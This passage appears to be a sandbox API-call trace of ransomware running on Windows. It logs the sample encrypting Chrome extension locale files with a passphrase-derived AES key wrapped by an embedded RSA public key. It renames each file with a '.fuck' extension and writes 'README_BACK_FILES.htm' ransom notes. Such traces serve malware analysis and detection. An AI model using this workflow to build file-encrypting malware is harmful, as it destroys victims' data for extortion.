GetLastError () returned 0x0 [0253.197] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json")) returned 0x20 [0253.199] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0253.199] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.200] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.201] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.202] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.204] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.204] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.204] CryptHashData (hHash=0x29846a0, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.204] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.205] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.205] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.205] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298def0) returned 1 [0253.205] CryptImportPublicKeyInfo (in: hCryptProv=0x298def0, dwCertEncodingType=0x1, pInfo=0x29959d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995a00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995a08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985520) returned 1 [0253.205] CryptEncrypt (in: hKey=0x2985520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.205] CryptEncrypt (in: hKey=0x2985520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986190*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986190*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.205] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2986190*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986190*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.207] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe2, lpOverlapped=0x0) returned 1 [0253.208] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.208] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.208] CloseHandle (hObject=0x5d60) returned 1 [0253.208] CloseHandle (hObject=0x5d5c) returned 1 [0253.208] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0253.212] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0253.212] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0253.213] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0253.215] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.215] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.215] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.215] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.215] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.215] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0253.215] AreFileApisANSI () returned 1 [0253.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.216] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.216] GetFileType (hFile=0x5d50) returned 0x1 [0253.216] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.218] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.218] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.218] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.218] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.218] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.218] GetLastError () returned 0x0 [0253.218] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json")) returned 0x20 [0253.219] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json", dwFileAttributes=0x80) returned 1 [0253.219] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.220] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.221] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.221] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.224] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.224] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.224] CryptHashData (hHash=0x29846a0, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.224] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.224] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.224] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.224] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986328) returned 1 [0253.225] CryptImportPublicKeyInfo (in: hCryptProv=0x2986328, dwCertEncodingType=0x1, pInfo=0x2995aa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995ad0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995ad8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29850e0) returned 1 [0253.225] CryptEncrypt (in: hKey=0x29850e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.225] CryptEncrypt (in: hKey=0x29850e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986218*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986218*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.225] WriteFile (in: hFile=0x5d60, lpBuffer=0x2986218*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986218*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.226] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xee, lpOverlapped=0x0) returned 1 [0253.227] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xee, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.227] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.228] CloseHandle (hObject=0x5d5c) returned 1 [0253.228] CloseHandle (hObject=0x5d60) returned 1 [0253.228] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), bFailIfExists=0) returned 1 [0253.231] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json", dwFileAttributes=0x0) returned 1 [0253.232] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.gsg")) returned 1 [0253.233] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.fuck")) returned 1 [0253.234] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.234] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.234] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.234] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.234] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.234] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\readme_back_files.htm")) returned 0xffffffff [0253.235] AreFileApisANSI () returned 1 [0253.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.235] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.235] GetFileType (hFile=0x5d50) returned 0x1 [0253.235] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.236] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.237] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.237] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.237] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.237] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.237] GetLastError () returned 0x0 [0253.237] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json")) returned 0x20 [0253.238] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0253.239] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.239] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.240] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.240] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.242] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.243] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.243] CryptHashData (hHash=0x29846a0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.243] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.243] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.243] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.243] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29863b0) returned 1 [0253.243] CryptImportPublicKeyInfo (in: hCryptProv=0x29863b0, dwCertEncodingType=0x1, pInfo=0x2995c40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995c70*, 